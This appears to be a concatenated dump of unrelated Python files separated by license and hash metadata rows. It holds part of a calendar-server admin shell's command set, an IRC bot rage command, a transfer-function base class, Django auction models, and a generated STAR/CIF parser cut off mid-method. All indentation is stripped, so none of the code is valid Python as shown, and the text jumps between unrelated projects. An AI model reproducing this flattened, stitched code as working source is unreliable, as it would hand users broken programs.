if doc:
# Get length of indentation
i = len(doc[0]) - len(doc[0].lstrip())
result = []
for line in doc:
result.append(line[i:])
return "\n".join(result)
else:
self.terminal.write("(No documentation available for %s)\n" % (command,))
else:
raise NotFoundError("Unknown command: %s" % (command,))
def getTarget(self, tokens, wdFallback=False):
"""
Pop's the first token from tokens and locates the File
indicated by that token.
@return: a C{File}.
"""
if tokens:
return self.wd.locate(tokens.pop(0).split("/"))
else:
if wdFallback:
return succeed(self.wd)
else:
return succeed(None)
@inlineCallbacks
def getTargets(self, tokens, wdFallback=False):
"""
For each given C{token}, locate a File to operate on.
@return: iterable of C{File} objects.
"""
if tokens:
result = []
for token in tokens:
try:
target = (yield self.wd.locate(token.split("/")))
except NotFoundError:
raise UsageError("No such target: %s" % (token,))
result.append(target)
returnValue(result)
else:
if wdFallback:
returnValue((self.wd,))
else:
returnValue(())
def directoryRecordWithID(self, id):
"""
Obtains a directory record corresponding to the given C{id}.
C{id} is assumed to be a record UID. For convenience, may
also take the form C{type:name}, where C{type} is a record
type and C{name} is a record short name.
@return: an C{IDirectoryRecord}
"""
directory = self.protocol.service.directory
record = directory.recordWithUID(id)
if not record:
# Try type:name form
try:
recordType, shortName = id.split(":")
except ValueError:
pass
else:
record = directory.recordWithShortName(recordType, shortName)
return record
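# Lookup sketch (both ids are illustrative): the two forms resolve to the
# same record when it exists in the directory:
#   self.directoryRecordWithID("6423F94A-6B76-4A3A-815B-D52CFD77935D")
#   self.directoryRecordWithID("users:wsanchez")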
def commands(self, showHidden=False):
"""
@return: an iterable of C{(name, method)} tuples, where
C{name} is the name of the command and C{method} is the method
that implements it.
"""
for attr in dir(self):
if attr.startswith("cmd_"):
m = getattr(self, attr)
if showHidden or not hasattr(m, "hidden"):
yield (attr[4:], m)
@staticmethod
def complete(word, items):
"""
List completions for the given C{word} from the given
C{items}.
Completions are the remaining portions of words in C{items}
that start with C{word}.
For example, if C{"foobar"} and C{"foo"} are in C{items}, then
C{""} and C{"bar"} are completions when C{word} C{"foo"}.
@return: an iterable of completions.
"""
for item in items:
if item.startswith(word):
yield item[len(word):]
def complete_commands(self, word):
"""
@return: an iterable of command name completions.
"""
def complete(showHidden):
return self.complete(
word,
(name for name, method in self.commands(showHidden=showHidden))
)
completions = tuple(complete(False))
# If no completions are found, try hidden commands.
if not completions:
completions = complete(True)
return completions
@inlineCallbacks
def complete_files(self, tokens, filter=None):
"""
@return: an iterable of C{File} path completions.
"""
if filter is None:
filter = lambda item: True
if tokens:
token = tokens[-1]
i = token.rfind("/")
if i == -1:
# No "/" in token
base = self.wd
word = token
else:
base = (yield self.wd.locate(token[:i].split("/")))
word = token[i + 1:]
else:
base = self.wd
word = ""
files = (
entry.toString()
for entry in (yield base.list())
if filter(entry)
)
if len(tokens) == 0:
returnValue(files)
else:
returnValue(self.complete(word, files))
class Commands(CommandsBase):
"""
Data store commands.
"""
#
# Basic CLI tools
#
def cmd_exit(self, tokens):
"""
Exit the shell.
usage: exit
"""
if tokens:
raise UnknownArguments(tokens)
self.protocol.exit()
def cmd_help(self, tokens):
"""
Show help.
usage: help [command]
"""
if tokens:
command = tokens.pop(0)
else:
command = None
if tokens:
raise UnknownArguments(tokens)
if command:
self.terminal.write(self.documentationForCommand(command))
self.terminal.nextLine()
else:
self.terminal.write("Available commands:\n")
result = []
max_len = 0
for name, m in self.commands():
for line in m.__doc__.split("\n"):
line = line.strip()
if line:
doc = line
break
else:
doc = "(no info available)"
if len(name) > max_len:
max_len = len(name)
result.append((name, doc))
format = " %%%ds - %%s\n" % (max_len,)
for info in sorted(result):
self.terminal.write(format % (info))
def complete_help(self, tokens):
if len(tokens) == 0:
return (name for name, method in self.commands())
elif len(tokens) == 1:
return self.complete_commands(tokens[0])
else:
return ()
def cmd_emulate(self, tokens):
"""
Emulate editor behavior.
The only correct argument is: emacs
Other choices include: none
usage: emulate editor
"""
if not tokens:
if self.protocol.emulate:
self.terminal.write("Emulating %s.\n" % (self.protocol.emulate,))
else:
self.terminal.write("Emulation disabled.\n")
return
editor = tokens.pop(0).lower()
if tokens:
raise UnknownArguments(tokens)
if editor == "none":
self.terminal.write("Disabling emulation.\n")
editor = None
elif editor in self.protocol.emulation_modes:
self.terminal.write("Emulating %s.\n" % (editor,))
else:
raise UsageError("Unknown editor: %s" % (editor,))
self.protocol.emulate = editor
# FIXME: Need to update key registrations
cmd_emulate.hidden = "incomplete"
def complete_emulate(self, tokens):
if len(tokens) == 0:
return self.protocol.emulation_modes
elif len(tokens) == 1:
return self.complete(tokens[0], self.protocol.emulation_modes)
else:
return ()
def cmd_log(self, tokens):
"""
Enable logging.
usage: log [file]
"""
if hasattr(self, "_logFile"):
self.terminal.write("Already logging to file: %s\n" % (self._logFile,))
return
if tokens:
fileName = tokens.pop(0)
else:
fileName = "/tmp/shell.log"
if tokens:
raise UnknownArguments(tokens)
from twisted.python.log import startLogging
try:
f = open(fileName, "w")
except (IOError, OSError), e:
self.terminal.write("Unable to open file %s: %s\n" % (fileName, e))
return
startLogging(f)
self._logFile = fileName
cmd_log.hidden = "debug tool"
def cmd_version(self, tokens):
"""
Print version.
usage: version
"""
if tokens:
raise UnknownArguments(tokens)
self.terminal.write("%s\n" % (version,))
#
# Filesystem tools
#
def cmd_pwd(self, tokens):
"""
Print working folder.
usage: pwd
"""
if tokens:
raise UnknownArguments(tokens)
self.terminal.write("%s\n" % (self.wd,))
@inlineCallbacks
def cmd_cd(self, tokens):
"""
Change working folder.
usage: cd [folder]
"""
if tokens:
dirname = tokens.pop(0)
else:
return
if tokens:
raise UnknownArguments(tokens)
wd = (yield self.wd.locate(dirname.split("/")))
if not isinstance(wd, Folder):
raise NotFoundError("Not a folder: %s" % (wd,))
#log.info("wd -> %s" % (wd,))
self.wd = wd
@inlineCallbacks
def complete_cd(self, tokens):
returnValue((yield self.complete_files(
tokens,
filter=lambda item: True #issubclass(item[0], Folder)
)))
@inlineCallbacks
def cmd_ls(self, tokens):
"""
List target.
usage: ls [target ...]
"""
targets = (yield self.getTargets(tokens, wdFallback=True))
        multiple = len(targets) > 1
for target in targets:
entries = sorted((yield target.list()), key=lambda e: e.fileName)
#
# FIXME: this can be ugly if, for example, there are zillions
# of entries to output. Paging would be good.
#
table = Table()
for entry in entries:
table.addRow(entry.toFields())
if multiple:
self.terminal.write("%s:\n" % (target,))
if table.rows:
table.printTable(self.terminal)
self.terminal.nextLine()
complete_ls = CommandsBase.complete_files
@inlineCallbacks
def cmd_info(self, tokens):
"""
Print information about a target.
usage: info [target]
"""
target = (yield self.getTarget(tokens, wdFallback=True))
if tokens:
raise UnknownArguments(tokens)
description = (yield target.describe())
self.terminal.write(description)
self.terminal.nextLine()
complete_info = CommandsBase.complete_files
@inlineCallbacks
def cmd_cat(self, tokens):
"""
Show contents of target.
usage: cat target [target ...]
"""
targets = (yield self.getTargets(tokens))
if not targets:
raise InsufficientArguments()
for target in targets:
if hasattr(target, "text"):
text = (yield target.text())
self.terminal.write(text)
complete_cat = CommandsBase.complete_files
@inlineCallbacks
def cmd_rm(self, tokens):
"""
Remove target.
usage: rm target [target ...]
"""
options, tokens = getopt(tokens, "", ["no-implicit"])
implicit = True
for option, _ignore_value in options:
if option == "--no-implicit":
# Not in docstring; this is really dangerous.
implicit = False
else:
                raise AssertionError("We shouldn't be here.")
targets = (yield self.getTargets(tokens))
if not targets:
raise InsufficientArguments()
for target in targets:
if hasattr(target, "delete"):
target.delete(implicit=implicit)
else:
self.terminal.write("Can not delete read-only target: %s\n" % (target,))
cmd_rm.hidden = "Incomplete"
complete_rm = CommandsBase.complete_files
#
# Principal tools
#
@inlineCallbacks
def cmd_find_principals(self, tokens):
"""
Search for matching principals
        usage: find_principals search_term
"""
if not tokens:
raise UsageError("No search term")
directory = self.protocol.service.directory
records = (yield findRecords(directory, tokens))
if records:
self.terminal.write((yield summarizeRecords(directory, records)))
else:
self.terminal.write("No matching principals found.")
self.terminal.nextLine()
@inlineCallbacks
def cmd_print_principal(self, tokens):
"""
Print information about a principal.
usage: print_principal principal_id
"""
if tokens:
id = tokens.pop(0)
else:
raise UsageError("Principal ID required")
if tokens:
raise UnknownArguments(tokens)
directory = self.protocol.service.directory
record = self.directoryRecordWithID(id)
if record:
self.terminal.write((yield recordInfo(directory, record)))
else:
self.terminal.write("No such principal.")
self.terminal.nextLine()
#
# Data purge tools
#
@inlineCallbacks
def cmd_purge_principals(self, tokens):
"""
        Purge data associated with principals.
usage: purge_principals principal_id [principal_id ...]
"""
dryRun = True
completely = False
doimplicit = True
directory = self.protocol.service.directory
records = []
for id in tokens:
record = self.directoryRecordWithID(id)
records.append(record)
if not record:
self.terminal.write("Unknown UID: %s\n" % (id,))
if None in records:
self.terminal.write("Aborting.\n")
return
if dryRun:
toPurge = "to purge"
else:
toPurge = "purged"
total = 0
for record in records:
count, _ignore_assignments = (yield PurgePrincipalService.purgeUIDs(
self.protocol.service.store,
directory,
(record.uid,),
verbose=False,
dryrun=dryRun,
completely=completely,
doimplicit=doimplicit,
))
total += count
self.terminal.write(
"%d events %s for UID %s.\n"
% (count, toPurge, record.uid)
)
self.terminal.write(
"%d total events %s.\n"
% (total, toPurge)
)
cmd_purge_principals.hidden = "incomplete"
#
# Sharing
#
def cmd_share(self, tokens):
"""
Share a resource with a principal.
usage: share mode principal_id target [target ...]
mode: r (read) or rw (read/write)
"""
if len(tokens) < 3:
raise InsufficientArguments()
mode = tokens.pop(0)
principalID = tokens.pop(0)
record = self.directoryRecordWithID(principalID)
if not record:
self.terminal.write("Principal not found: %s\n" % (principalID,))
targets = self.getTargets(tokens)
if mode == "r":
mode = None
elif mode == "rw":
mode = None
else:
raise UsageError("Unknown mode: %s" % (mode,))
for _ignore_target in targets:
raise NotImplementedError()
cmd_share.hidden = "incomplete"
#
# Python prompt, for the win
#
def cmd_python(self, tokens):
"""
Switch to a python prompt.
usage: python
"""
if tokens:
raise UnknownArguments(tokens)
if not hasattr(self, "_interpreter"):
# Bring in some helpful local variables.
from txdav.common.datastore.sql_tables import schema
from twext.enterprise.dal import syntax
localVariables = dict(
self=self,
store=self.protocol.service.store,
schema=schema,
)
# FIXME: Use syntax.__all__, which needs to be defined
for key, value in syntax.__dict__.items():
if not key.startswith("_"):
localVariables[key] = value
class Handler(object):
def addOutput(innerSelf, bytes, async=False): #@NoSelf
"""
This is a delegate method, called by ManholeInterpreter.
"""
if async:
self.terminal.write("... interrupted for Deferred ...\n")
self.terminal.write(bytes)
if async:
self.terminal.write("\n")
self.protocol.drawInputLine()
self._interpreter = ManholeInterpreter(Handler(), localVariables)
def evalSomePython(line):
if line == "exit":
# Return to normal command mode.
del self.protocol.lineReceived
del self.protocol.ps
try:
del self.protocol.pn
except AttributeError:
pass
self.protocol.drawInputLine()
return
more = self._interpreter.push(line)
self.protocol.pn = bool(more)
lw = self.terminal.lastWrite
if not (lw.endswith("\n") or lw.endswith("\x1bE")):
self.terminal.write("\n")
self.protocol.drawInputLine()
self.protocol.lineReceived = evalSomePython
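        # (primary prompt, continuation prompt), mirroring the standard Python REPL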
self.protocol.ps = (">>> ", "... ")
cmd_python.hidden = "debug tool"
#
# SQL prompt, for not as winning
#
def cmd_sql(self, tokens):
"""
Switch to an SQL prompt.
usage: sql
"""
if tokens:
raise UnknownArguments(tokens)
raise NotImplementedError("Command not implemented")
cmd_sql.hidden = "not implemented"
#
# Test tools
#
def cmd_raise(self, tokens):
"""
Raises an exception.
usage: raise [message ...]
"""
raise RuntimeError(" ".join(tokens))
cmd_raise.hidden = "test tool"
def cmd_reload(self, tokens):
"""
Reloads code.
usage: reload
"""
if tokens:
raise UnknownArguments(tokens)
import calendarserver.tools.shell.vfs
reload(calendarserver.tools.shell.vfs)
import calendarserver.tools.shell.directory
reload(calendarserver.tools.shell.directory)
self.protocol.reloadCommands()
cmd_reload.hidden = "test tool"
def cmd_xyzzy(self, tokens):
"""
"""
self.terminal.write("Nothing happens.")
self.terminal.nextLine()
cmd_sql.hidden = ""
|
apache-2.0
| -2,939,539,558,737,499,600 | 24.388889 | 90 | 0.532914 | false |
sckasturi/saltlake
|
commands/creffett.py
|
1
|
1622
|
# Copyright (C) 2013-2014 Fox Wilson, Peter Foley, Srijay Kasturi, Samuel Damashek, James Forcier and Reed Koser
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
from helpers.command import Command
from helpers.textutils import gen_creffett
@Command(['creffett', 'rage'], ['nick', 'target', 'ignore', 'do_kick', 'botnick', 'name'])
def cmd(send, msg, args):
"""RAGE!!!
Syntax: {command} <text>
"""
if args['name'] == 'creffett':
if not args['nick'].startswith('creffett') and args['nick'] != args['botnick']:
send("You're not creffett!")
args['ignore'](args['nick'])
if args['target'] != 'private':
args['do_kick'](args['target'], args['nick'], 'creffett impersonation')
return
if not msg:
send("Rage about what?")
return
# c.send_raw("MODE %s -c" % CHANNEL)
send(gen_creffett(msg))
# c.send_raw("MODE %s +c" % CHANNEL)
send('</rage>')
|
gpl-2.0
| 4,373,758,906,741,645,000 | 40.589744 | 112 | 0.660296 | false |
IntegratedAlarmSystem-Group/ias
|
CompElement/src/main/python/IasTransferFunction/TransferFunction.py
|
1
|
4513
|
import logging
class TransferFunction(object):
'''
    Base (and abstract) class to provide TFs in the python programming language.
    Usage: python TF implementations must extend this class and provide, as a
    minimum, the implementation of the eval method.
It is the python equivalent of the JavaTransferExecutor class
'''
def __init__(self, asceId, asceRunningId, validityTimeFrame, props, instance):
'''
Constructor
:param asceId: The ID of the ASCE that runs the python TF
:param asceRunningId: The running ID of the ASCE that runs the python TF
:param validityTimeFrame: The validity time frame (long)
        :param props: a dictionary of properties
        :param instance: the instance number (int) of the template, or None if not templated
'''
assert asceId is not None and asceId!="", "Invalid ID of ASCE"
self.asceID=asceId
logging.debug("Building python TF for ASCE %s",self.asceID)
assert asceRunningId is not None and asceRunningId!="", "Invalid running ID of ASCE"
self.asceRunningId = asceRunningId
        assert validityTimeFrame>=0, "Invalid validity time frame "+str(validityTimeFrame)
self.validityTimeFrame=validityTimeFrame
if props is None:
self.props = {}
else:
assert isinstance(props,dict)
self.props=props
self.instance = None
if instance is not None:
assert isinstance(instance,int), "The instance must be an integer"
self.instance = instance
logging.info("Python TF of %s successfully built",self.asceRunningId)
def setTemplateInstance(self, instance):
'''
Set the instance of the template, if any.
:param instance: the instance number or None if there is no template
:return:
'''
self.instance=instance
if (self.instance is None):
logging.debug("Python TF of %s is NOT templated",self.asceRunningId)
else:
logging.info("Python TF of %s has template %d",self.asceRunningId,self.instance)
def isTemplated(self):
'''
        :return: the number of the instance or None if not templated
'''
return self.instance is not None
def shutdown(self):
'''
Last method called when the object life terminates.
It is usually called to free acquired resources.
:return:
'''
pass
def initialize(self, inputsInfo, outputInfo):
'''
Initialize the TF.
        Must be overridden if the user-provided implementation needs
        to know the IDs and types of the inputs and the output.
        It is usually implemented to increase robustness: for example,
        if the user-implemented TF compares the value of an input with a
        threshold, this method can be used to check that the input is numeric.
:param inputsInfo: the list of IasioInfo with the ids and type of inputs
:param outputInfo: the type and ID of the output
:return: None
'''
pass
def eval(self,compInputs, actualOutput):
'''
The eval method to produce the output based on the value of the inputs
:param compInputs: computing element inputs (IASIOs)
        :param actualOutput: the actual value of the output, i.e. the value
        computed at the previous iteration (IASIO)
:return: the new output of the ASCE (IASIO)
'''
raise NotImplementedError('Python TF implementation missing')
def getValue(self, inputs, id, instance):
'''
Get a value from its ID taking into account templates
It is the same method present in the JavaTransferExecutor and in ScalaTransferExecutor
:param inputs: the map of inputs as received in the eval method
:param id: the id (string) of the input (without template)
:param instance: the instance (int) or None if not templated
:return: the value or None if not found
'''
if (inputs is None or id is None):
raise ValueError("Maps of input and id can't be None")
        assert isinstance(inputs,dict), "Map of inputs expected"
assert isinstance(id,str), "The ID must be a string"
if instance is not None:
            assert isinstance(instance,int), "The instance must be an integer (instead of "+str(instance)+")"
postFix= "[!#"+str(instance)+"!]"
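            # e.g. id "Temperature" with instance 3 is looked up as "Temperature[!#3!]"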
else:
postFix = ""
idToSearch = id + postFix
return inputs.get(idToSearch)
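# --- Illustrative sketch, not part of the original module -------------------
# A hypothetical minimal subclass showing the contract described in the class
# docstring: only eval() must be overridden. The class name and the
# pass-through logic are assumptions for demonstration purposes.
class PassThroughTF(TransferFunction):
    def eval(self, compInputs, actualOutput):
        # Return the value of an arbitrary input as the new output; a real
        # TF would derive the output from its inputs here.
        return next(iter(compInputs.values()))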
|
lgpl-3.0
| 4,129,720,936,681,593,300 | 36.305785 | 104 | 0.637049 | false |
ajportier/djauction
|
models.py
|
1
|
3333
|
from django.db import models
STATE_CHOICES = (
('pa', 'Pennsylvania'),
('nj', 'New Jersey'),
)
ITEM_CHOICES = (
('event','Event'),
('food','Food'),
('goods','Goods'),
('service','Service'),
('other','Other'),
)
PAYMENT_CHOICES = (
('none','None'),
('cash','Cash'),
('check','Check'),
('credit','Credit'),
)
class Auction(models.Model):
''' Model to represent an Auction '''
name = models.CharField(max_length=255)
date = models.DateField()
def __unicode__(self):
return self.name + ' ' + str(self.date)
class AuctionUser(models.Model):
    ''' Model to represent an Auction User; i.e. someone who donates
    items or bids on them '''
name = models.CharField(max_length=255)
address_1 = models.CharField(max_length=255, blank=True)
address_2 = models.CharField(max_length=255, blank=True)
city = models.CharField(max_length=255, blank=True)
state = models.CharField(max_length=2, choices=STATE_CHOICES,
blank=True)
zip = models.CharField(max_length=10, blank=True)
phone = models.CharField(max_length=255, blank=True)
email = models.EmailField(max_length=255, blank=True)
def __unicode__(self):
return self.name
class AuctionParticipant(models.Model):
''' Model to represent an Auction Participant; i.e. someone who
will be bidding on items in the auction '''
auction = models.ForeignKey(Auction)
user = models.ForeignKey(AuctionUser)
paddle = models.PositiveIntegerField()
payment_method = models.CharField(max_length=10, choices=PAYMENT_CHOICES,
default='none')
payment_notes = models.TextField(blank=True)
def __unicode__(self):
return str(self.user) + ' (' + str(self.paddle) + ')'
class AuctionEvent(models.Model):
''' Model to represent an Auction Event; i.e. a collection of items
that will be bid on during the auction '''
name = models.CharField(max_length=255)
abbreviation = models.CharField(max_length=10)
auction = models.ForeignKey(Auction)
def __unicode__(self):
return self.name + ' ' + self.abbreviation
class AuctionItem(models.Model):
''' Model to represent an Item to be bid on in an auction '''
name = models.CharField(max_length=255)
item_type = models.CharField(max_length=20, choices=ITEM_CHOICES)
item_number = models.IntegerField()
description = models.TextField(blank=True)
image = models.ImageField(max_length=255,upload_to='images',blank=True)
valid_winners = models.PositiveIntegerField(default=1)
auction = models.ForeignKey(Auction)
auction_event = models.ForeignKey(AuctionEvent)
donor = models.ForeignKey(AuctionUser)
starting_bid = models.FloatField()
conditions = models.TextField(blank=True)
time_and_location = models.TextField(blank=True)
def __unicode__(self):
return str(self.auction_event.abbreviation) + str(self.item_number) + ' ' + self.name
class AuctionBid(models.Model):
''' Model to represent an individual Bid in an Auction '''
auction = models.ForeignKey(Auction)
bidder = models.ForeignKey(AuctionParticipant)
item = models.ForeignKey(AuctionItem)
ammount = models.FloatField()
def __unicode__(self):
return str(self.bidder) + ' ' + str(self.ammount)
|
gpl-3.0
| -4,610,285,118,682,957,000 | 29.861111 | 93 | 0.663366 | false |
heprom/pymicro
|
pymicro/external/YappsStarParser_2_0.py
|
1
|
21486
|
# To maximize python3/python2 compatibility
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from .StarFile import StarBlock,StarFile,StarList,StarDict
from io import StringIO
# An alternative specification for the Cif Parser, based on Yapps2
# by Amit Patel (http://theory.stanford.edu/~amitp/Yapps)
#
# helper code: we define our match tokens
lastval = ''
def monitor(location,value):
global lastval
#print 'At %s: %s' % (location,repr(value))
lastval = repr(value)
return value
# Strip extras gets rid of leading and trailing whitespace, and
# semicolons.
def stripextras(value):
from .StarFile import remove_line_folding, remove_line_prefix
# we get rid of semicolons and leading/trailing terminators etc.
import re
jj = re.compile("[\n\r\f \t\v]*")
semis = re.compile("[\n\r\f \t\v]*[\n\r\f]\n*;")
cut = semis.match(value)
if cut: #we have a semicolon-delimited string
nv = value[cut.end():len(value)-2]
try:
if nv[-1]=='\r': nv = nv[:-1]
except IndexError: #empty data value
pass
# apply protocols
nv = remove_line_prefix(nv)
nv = remove_line_folding(nv)
return nv
else:
cut = jj.match(value)
if cut:
return stripstring(value[cut.end():])
return value
# helper function to get rid of inverted commas etc.
def stripstring(value):
if value:
if value[0]== '\'' and value[-1]=='\'':
return value[1:-1]
if value[0]=='"' and value[-1]=='"':
return value[1:-1]
return value
# helper function to get rid of triple quotes
def striptriple(value):
if value:
if value[:3] == '"""' and value[-3:] == '"""':
return value[3:-3]
if value[:3] == "'''" and value[-3:] == "'''":
return value[3:-3]
return value
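# For illustration: stripstring("'abc'") -> "abc" and
# striptriple("'''abc'''") -> "abc"; unquoted values pass through unchanged.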
# helper function to populate a StarBlock given a list of names
# and values .
#
# Note that there may be an empty list at the very end of our itemlists,
# so we remove that if necessary.
#
def makeloop(target_block,loopdata):
loop_seq,itemlists = loopdata
if itemlists[-1] == []: itemlists.pop(-1)
# print('Making loop with %s' % repr(itemlists))
step_size = len(loop_seq)
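    # Loop values arrive flattened row by row; slicing with step_size pulls
    # out one column per data name, e.g. loop_seq = ['_a', '_b'] with
    # itemlists = [1, 'x', 2, 'y'] yields _a -> [1, 2] and _b -> ['x', 'y'].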
for col_no in range(step_size):
target_block.AddItem(loop_seq[col_no], itemlists[col_no::step_size],precheck=True)
# now construct the loop
try:
target_block.CreateLoop(loop_seq) #will raise ValueError on problem
except ValueError:
error_string = 'Incorrect number of loop values for loop containing %s' % repr(loop_seq)
print(error_string, file=sys.stderr)
raise ValueError(error_string)
# return an object with the appropriate amount of nesting
def make_empty(nestlevel):
gd = []
for i in range(1,nestlevel):
gd = [gd]
return gd
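# e.g. make_empty(1) -> [], make_empty(2) -> [[]], make_empty(3) -> [[[]]]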
# this function updates a dictionary first checking for name collisions,
# which imply that the CIF is invalid. We need case insensitivity for
# names.
# Unfortunately we cannot check loop item contents against non-loop contents
# in a non-messy way during parsing, as we may not have easy access to previous
# key value pairs in the context of our call (unlike our built-in access to all
# previous loops).
# For this reason, we don't waste time checking looped items against non-looped
# names during parsing of a data block. This would only match a subset of the
# final items. We do check against ordinary items, however.
#
# Note the following situations:
# (1) new_dict is empty -> we have just added a loop; do no checking
# (2) new_dict is not empty -> we have some new key-value pairs
#
def cif_update(old_dict,new_dict,loops):
old_keys = map(lambda a:a.lower(),old_dict.keys())
if new_dict != {}: # otherwise we have a new loop
#print 'Comparing %s to %s' % (repr(old_keys),repr(new_dict.keys()))
for new_key in new_dict.keys():
if new_key.lower() in old_keys:
raise CifError("Duplicate dataname or blockname %s in input file" % new_key)
old_dict[new_key] = new_dict[new_key]
#
# this takes two lines, so we couldn't fit it into a one line execution statement...
def order_update(order_array,new_name):
order_array.append(new_name)
return new_name
# and finally...turn a sequence into a python dict (thanks to Stackoverflow)
def pairwise(iterable):
try:
it = iter(iterable)
while 1:
yield next(it), next(it)
except StopIteration:
return
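# e.g. dict(pairwise(["a", 1, "b", 2])) == {"a": 1, "b": 2}; a trailing
# unpaired element is silently dropped.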
# Begin -- grammar generated by Yapps
import sys, re
from . import yapps3_compiled_rt as yappsrt
class StarParserScanner(yappsrt.Scanner):
def __init__(self, *args,**kwargs):
patterns = [
('":"', ':'),
('([ \t\n\r](?!;))|[ \t]', '([ \t\n\r](?!;))|[ \t]'),
('(#.*[\n\r](?!;))|(#.*)', '(#.*[\n\r](?!;))|(#.*)'),
('LBLOCK', '(L|l)(O|o)(O|o)(P|p)_'),
('GLOBAL', '(G|g)(L|l)(O|o)(B|b)(A|a)(L|l)_'),
('STOP', '(S|s)(T|t)(O|o)(P|p)_'),
('save_heading', u'(S|s)(A|a)(V|v)(E|e)_[][!%&\\(\\)*+,./:<=>?@0-9A-Za-z\\\\^`{}\\|~"#$\';_\xa0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd-]+'),
('save_end', '(S|s)(A|a)(V|v)(E|e)_'),
('data_name', u'_[][!%&\\(\\)*+,./:<=>?@0-9A-Za-z\\\\^`{}\\|~"#$\';_\xa0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd-]+'),
('data_heading', u'(D|d)(A|a)(T|t)(A|a)_[][!%&\\(\\)*+,./:<=>?@0-9A-Za-z\\\\^`{}\\|~"#$\';_\xa0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd-]+'),
('start_sc_line', '(\n|\r\n);([^\n\r])*(\r\n|\r|\n)+'),
('sc_line_of_text', '[^;\r\n]([^\r\n])*(\r\n|\r|\n)+'),
('end_sc_line', ';'),
('c_c_b', '\\}'),
('o_c_b', '\\{'),
('c_s_b', '\\]'),
('o_s_b', '\\['),
('dat_val_internal_sq', '\\[([^\\s\\[\\]]*)\\]'),
('triple_quote_data_value', '(?s)\'\'\'.*?\'\'\'|""".*?"""'),
('single_quote_data_value', '\'([^\n\r\x0c\'])*\'+|"([^\n\r"])*"+'),
('data_value_1', '((?!(((S|s)(A|a)(V|v)(E|e)_[^\\s]*)|((G|g)(L|l)(O|o)(B|b)(A|a)(L|l)_[^\\s]*)|((S|s)(T|t)(O|o)(P|p)_[^\\s]*)|((D|d)(A|a)(T|t)(A|a)_[^\\s]*)))[^\\s"#$\'_\\{\\}\\[\\]][^\\s\\{\\}\\[\\]]*)'),
('END', '$'),
]
yappsrt.Scanner.__init__(self,patterns,['([ \t\n\r](?!;))|[ \t]', '(#.*[\n\r](?!;))|(#.*)'],*args,**kwargs)
class StarParser(yappsrt.Parser):
Context = yappsrt.Context
def input(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'input', [prepared])
_token = self._peek('END', 'data_heading')
if _token == 'data_heading':
dblock = self.dblock(prepared, _context)
allblocks = prepared; allblocks.merge_fast(dblock)
while self._peek('END', 'data_heading') == 'data_heading':
dblock = self.dblock(prepared, _context)
allblocks.merge_fast(dblock)
if self._peek() not in ['END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['END', 'data_heading']))
END = self._scan('END')
else: # == 'END'
END = self._scan('END')
allblocks = prepared
allblocks.unlock(); return allblocks
def dblock(self, prepared, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'dblock', [prepared])
data_heading = self._scan('data_heading')
heading = data_heading[5:];thisbc=StarFile(characterset='unicode',standard=prepared.standard);act_heading = thisbc.NewBlock(heading,prepared.blocktype(overwrite=False));stored_block = thisbc[act_heading]
while self._peek('save_heading', 'save_end', 'LBLOCK', 'data_name', 'END', 'data_heading') in ['save_heading', 'LBLOCK', 'data_name']:
_token = self._peek('save_heading', 'LBLOCK', 'data_name')
if _token != 'save_heading':
dataseq = self.dataseq(stored_block, _context)
else: # == 'save_heading'
save_frame = self.save_frame(prepared, _context)
thisbc.merge_fast(save_frame,parent=stored_block)
if self._peek() not in ['save_heading', 'save_end', 'LBLOCK', 'data_name', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['save_heading', 'save_end', 'LBLOCK', 'data_name', 'END', 'data_heading']))
stored_block.setmaxnamelength(stored_block.maxnamelength);return (monitor('dblock',thisbc))
def dataseq(self, starblock, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'dataseq', [starblock])
data = self.data(starblock, _context)
while self._peek('save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading') in ['LBLOCK', 'data_name']:
data = self.data(starblock, _context)
if self._peek() not in ['save_end', 'LBLOCK', 'data_name', 'save_heading', 'END', 'data_heading']:
raise yappsrt.YappsSyntaxError(charpos=self._scanner.get_prev_char_pos(), context=_context, msg='Need one of ' + ', '.join(['LBLOCK', 'data_name', 'save_end', 'save_heading', 'END', 'data_heading']))
def data(self, currentblock, _parent=None):
_context = self.Context(_parent, self._scanner, self._pos, 'data', [currentblock])
_token = self._peek('LBLOCK', 'data_name')
if _token == 'LBLOCK':
